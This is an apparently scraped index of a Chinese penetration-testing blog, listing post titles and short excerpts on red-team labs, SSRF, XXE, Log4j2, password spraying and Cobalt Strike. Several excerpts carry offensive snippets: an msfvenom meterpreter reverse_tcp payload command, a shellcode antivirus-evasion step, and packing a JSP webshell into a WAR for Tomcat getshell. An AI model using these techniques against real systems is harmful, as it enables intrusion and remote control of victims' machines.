The byzain.github.io from byzain

白嫖机场教程 | Zain

https://byzain.github.io/2022/07/04/%E7%99%BD%E5%AB%96%E6%9C%BA%E5%9C%BA%E6%95%99%E7%A8%8B/#more

这是一篇加密文章，需要密码才能继续阅读。

windows应急响应 | Zain

https://byzain.github.io/2021/05/04/windows%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/

开机启动排查 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 按下Win徽+R 输入msconfig 选择启动选项卡任务管理器-启动选项卡按下Win徽+R 输入regedit查找HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\

pte知识点 | Zain

https://byzain.github.io/2022/08/31/pte%E7%9F%A5%E8%AF%86%E7%82%B9/

这是一篇加密文章，需要密码才能继续阅读。

神器收藏 | Zain

https://byzain.github.io/2022/07/05/%E7%A5%9E%E5%99%A8%E6%94%B6%E8%97%8F/

这是一篇加密文章，需要密码才能继续阅读。

制作自己专属的iso镜像 | Zain

https://byzain.github.io/%E5%88%B6%E4%BD%9C%E8%87%AA%E5%B7%B1%E4%B8%93%E5%B1%9E%E7%9A%84iso%E9%95%9C%E5%83%8F/

很多时候想重装系统，但是又觉得配置环境麻烦。所以我们可以通过制作自己专属的iso文件，让重装的系统包含我们配置好的环境。

cobaltstrike中文乱码解决 | Zain

https://byzain.github.io/2020/09/04/cobaltstrike%E4%B8%AD%E6%96%87%E4%B9%B1%E7%A0%81%E8%A7%A3%E5%86%B3/

CobaltStrike 乱码解决Windows电脑上CS乱码了，文字都变成空心方块了。这里总结了网上的所有方法，推荐使用方法3。

红队环境(Vulnstack4) | Zain

https://byzain.github.io/2021/01/04/%E7%BA%A2%E9%98%9F%E7%8E%AF%E5%A2%83-Vulnstack4/#more

环境下载地址红队靶场 Vlunstack 4 的打靶记录 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

htaccess文件的深入学习 | Zain

https://byzain.github.io/2020/07/17/htaccess%E6%96%87%E4%BB%B6%E7%9A%84%E6%B7%B1%E5%85%A5%E5%AD%A6%E4%B9%A0/#more

基本概念.htaccess允许用户在此目录及子目录中按照.htaccess配置文件中的规则来解析。需要注意的是：.htaccess中的配置会覆盖全局配置，另外如果子目录中也有.htaccess，其优先级会高于父目录，也就是会覆盖父目录中的规则。管理员可以通过修改apache配置文件中的AllowOverride来开启.htaccess的解析。

使用atexec进行喷洒攻击 | Zain

https://byzain.github.io/%E4%BD%BF%E7%94%A8atexec%E8%BF%9B%E8%A1%8C%E5%96%B7%E6%B4%92%E6%94%BB%E5%87%BB/

工具下载地址 https://github.com/maaaaz/impacket-examples-windows

ssrf小结 | Zain

https://byzain.github.io/2021/08/04/ssrf%E5%B0%8F%E7%BB%93/#more

前言前两天面试时突然问起SSRF，这词咋这么熟悉呢！但是又想不起来具体的内容，面试结束后翻阅文档觉得很遗憾，因为之前有学习过，不过时间长没用忘掉了，特此写一篇文章加深印象！

体验Midjourney作画 | Zain

https://byzain.github.io/2022/09/07/%E4%BD%93%E9%AA%8CMidjourney%E4%BD%9C%E7%94%BB/

上传博客的html页面格式

hello! 我对您的博客很感兴趣, 想以您的博客为模板进行fork, 在基础配置更改后, 我想知道写好一篇博客之后如何进行上传, 因为我看到每一篇博客的呈现形式都是一个html页面, 对此不是很清楚, 希望您可以解答一下~😊

Tomcat弱口令Getshell | Zain

https://byzain.github.io/Tomcat%E5%BC%B1%E5%8F%A3%E4%BB%A4Getshell/

常用用户admin/tomcat/root 生成恶意war包将冰蝎jsp木马打包成zip，修改zip后缀为war

xxe常用POC | Zain

https://byzain.github.io/2020/11/04/xxe%E5%B8%B8%E7%94%A8POC/

有回显xxe如果页面存在回显型xxe漏洞，页面会显示gg（poc） 1gg<\gg>

fofa语法收藏 | Zain

https://byzain.github.io/fofa%E8%AF%AD%E6%B3%95%E6%94%B6%E8%97%8F/

这是一篇加密文章，需要密码才能继续阅读。

虚拟磁盘转换 | Zain

https://byzain.github.io/2022/08/26/%E8%99%9A%E6%8B%9F%E7%A3%81%E7%9B%98%E8%BD%AC%E6%8D%A2/#more

vmdk转vhdvmware转hyperv 安装软件http://www.winimage.com/download.htm

cobaltstrike相关注意事项 | Zain

https://byzain.github.io/2022/08/20/cobaltstrike%E7%9B%B8%E5%85%B3%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9/#more

前言本文内容是基于cs4.3版本，讲了一些大家会遇到的一些坑。

通过DNSLOG回显验证漏洞 | Zain

https://byzain.github.io/%E9%80%9A%E8%BF%87DNSLOG%E5%9B%9E%E6%98%BE%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E/

通过DNSLOG回显验证漏洞前言实际渗透测试中，有些漏洞因为没有回显导致无法准确判断漏洞是否存在，可能导致渗透测试人员浪费大量精力在一个并不存在的漏洞上，因此为了验证一些无回显漏洞，可结合DNSlog平台进行测试，本文使用的DNSlog平台链接如下：http://dnslog.cn/

抓取goby的poc | Zain

https://byzain.github.io/2022/03/15/%E6%8A%93%E5%8F%96goby%E7%9A%84poc/#more

前言goby内置了很多poc，如果有红队的试用版，可以尝试抓取一波，补充自己的弹药库。

metasploit生成木马 | Zain

https://byzain.github.io/2021/03/04/metasploit%E7%94%9F%E6%88%90%E6%9C%A8%E9%A9%AC/

生成跨平台脚本木马我们知道了可以使用msfvenom生成木马，针对脚本语言比如python、ruby、php甚至powershell，需要选择对应的payload后使用-f raw指定使用源码生成，如下所示：生成powershell后门，meterpreter上线 1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1

使用atexec进行喷洒攻击 | Zain

https://byzain.github.io/2022/09/13/%E4%BD%BF%E7%94%A8atexec%E8%BF%9B%E8%A1%8C%E5%96%B7%E6%B4%92%E6%94%BB%E5%87%BB/

工具下载地址 https://github.com/maaaaz/impacket-examples-windows

Docker常用命令 | Zain

https://byzain.github.io/2021/08/26/Docker%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/#more

容器&镜像操作进入容器 1docker exec -it /bin/bash 从dockerfile构建镜像 12docker build -t [自定义名称]:[自定义tag] .注意最后有个点从镜像启动环境(随机端口) 1docker run -itd -P [指定镜像名称]:[指定镜像tag]

ssrf小结 | Zain

https://byzain.github.io/ssrf%E5%B0%8F%E7%BB%93/#more

前言前两天面试时突然问起SSRF，这词咋这么熟悉呢！但是又想不起来具体的内容，面试结束后翻阅文档觉得很遗憾，因为之前有学习过，不过时间长没用忘掉了，特此写一篇文章加深印象！

chromedp仿真爬虫 | Zain

https://byzain.github.io/2022/04/08/chromedp%E4%BB%BF%E7%9C%9F%E7%88%AC%E8%99%AB/

介绍golang仿真爬虫包功能完全模拟人工操作支持Chrome DevTools Protocol

hyperv安装kali及其相关应用 | Zain

https://byzain.github.io/2022/09/10/hyperv%E5%AE%89%E8%A3%85kali%E5%8F%8A%E5%85%B6%E7%9B%B8%E5%85%B3%E5%BA%94%E7%94%A8/?

hyperv中安装2022版kali以及相关配置的的详细教程

ApacheLog4j2远程代码执行漏洞 | Zain

https://byzain.github.io/2021/11/24/ApacheLog4j2%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#more

影响范围攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响

golang shellcode免杀 | Zain

https://byzain.github.io/golang-shellcode%E5%85%8D%E6%9D%80/

获得原始shellcode注意：生成shellcode时需要根据系统架构选择x86或者x64位shellcode，否则可能无法执行或者导致注入的原始进程崩溃。 msfvenom弹出计算机测试使用的shellcode： 1msfvenom -p windows/x64/exec CMD=calc.exe -f csharp

通过DNSLOG回显验证漏洞 | Zain

https://byzain.github.io/2020/06/04/%E9%80%9A%E8%BF%87DNSLOG%E5%9B%9E%E6%98%BE%E9%AA%8C%E8%AF%81%E6%BC%8F%E6%B4%9E/?highlight=%E5%A4%8D%E7%8E%B0

通过DNSLOG回显验证漏洞前言实际渗透测试中，有些漏洞因为没有回显导致无法准确判断漏洞是否存在，可能导致渗透测试人员浪费大量精力在一个并不存在的漏洞上，因此为了验证一些无回显漏洞，可结合DNSlog平台进行测试，本文使用的DNSlog平台链接如下：http://dnslog.cn/

hexo | Zain

https://byzain.github.io/hexo/

部署hexo先安装nodejs，不然没法使用npm 12345678# 全局安装hexonpm install -g hexo-cli# 创建并初始化hexo文件夹hexo init <文件夹># 进入创建好的目录cd <文件夹> # 使用npm安装相关依赖npm install

制作自己专属的iso镜像 | Zain

https://byzain.github.io/2022/09/15/%E5%88%B6%E4%BD%9C%E8%87%AA%E5%B7%B1%E4%B8%93%E5%B1%9E%E7%9A%84iso%E9%95%9C%E5%83%8F/

很多时候想重装系统，但是又觉得配置环境麻烦。所以我们可以通过制作自己专属的iso文件，让重装的系统包含我们配置好的环境。

nmap测试大网络空间中存活的主机 | Zain

https://byzain.github.io/2020/12/20/nmap%E6%B5%8B%E8%AF%95%E5%A4%A7%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E4%B8%AD%E5%AD%98%E6%B4%BB%E7%9A%84%E4%B8%BB%E6%9C%BA/

前言最近在做项目的时候由于客户Vlan划分的比较多，所以进行主机探测是一件特别消耗时间的工作，Nmap作为一款强大的探测工具怎么会没有这个功能呢？

白嫖机场教程 | Zain

https://byzain.github.io/%E7%99%BD%E5%AB%96%E6%9C%BA%E5%9C%BA%E6%95%99%E7%A8%8B/

这是一篇加密文章，需要密码才能继续阅读。

Tomcat弱口令Getshell | Zain

https://byzain.github.io/2022/08/26/Tomcat%E5%BC%B1%E5%8F%A3%E4%BB%A4Getshell/?

常用用户admin/tomcat/root 生成恶意war包将冰蝎jsp木马打包成zip，修改zip后缀为war

golang shellcode免杀 | Zain

https://byzain.github.io/2022/08/30/golang-shellcode%E5%85%8D%E6%9D%80/

获得原始shellcode注意：生成shellcode时需要根据系统架构选择x86或者x64位shellcode，否则可能无法执行或者导致注入的原始进程崩溃。 msfvenom弹出计算机测试使用的shellcode： 1msfvenom -p windows/x64/exec CMD=calc.exe -f csharp

hexo | Zain

https://byzain.github.io/2020/09/04/hexo/

部署hexo先安装nodejs，不然没法使用npm 12345678# 全局安装hexonpm install -g hexo-cli# 创建并初始化hexo文件夹hexo init <文件夹># 进入创建好的目录cd <文件夹> # 使用npm安装相关依赖npm install

抓取goby的poc | Zain

https://byzain.github.io/%E6%8A%93%E5%8F%96goby%E7%9A%84poc/?#%E5%B0%8F%E7%BB%93

前言goby内置了很多poc，如果有红队的试用版，可以尝试抓取一波，补充自己的弹药库。

体验Midjourney作画 | Zain

https://byzain.github.io/%E4%BD%93%E9%AA%8CMidjourney%E4%BD%9C%E7%94%BB/

windows远程管理-WinRm | Zain

https://byzain.github.io/windows%E8%BF%9C%E7%A8%8B%E7%AE%A1%E7%90%86-WinRm/#more

WinRm介绍winRm默认开放端口为5985端口。 Windows远程管理是“WS 管理协议的 Microsoft 实施，该协议是基于标准 SOAP、不受防火墙影响的协议，允许不同供应商的硬件和操作系统相互操作。而微软将其包含在他们的系统中，是为了便于系统管理员在日常工作中，远程管理服务器，或通过脚本同时管理多台服务器，以提高他们的工作效率。

metasploit小结 | Zain

https://byzain.github.io/2021/03/04/metasploit%E5%B0%8F%E7%BB%93/

meterpreter shell常识 mefconsole启动时在哪个目录，下载下来的文件就在哪个目录，也可以通过lcd命令切换本地临时目录。 getuid：查看当前权限 edit命令：就是msf中的vim，edit 文件 pgrep命令：从进程中筛选，并显示pid，比如pgrep notepad

cobaltstrike相关注意事项 | Zain

https://byzain.github.io/cobaltstrike%E7%9B%B8%E5%85%B3%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9/?highlight=cobal

前言本文内容是基于cs4.3版本，讲了一些大家会遇到的一些坑。

byzain / byzain.github.io Goto Github PK

byzain.github.io's People

Contributors

Stargazers

Watchers

Forkers

byzain.github.io's Issues

Recommend Projects

Recommend Topics

Recommend Org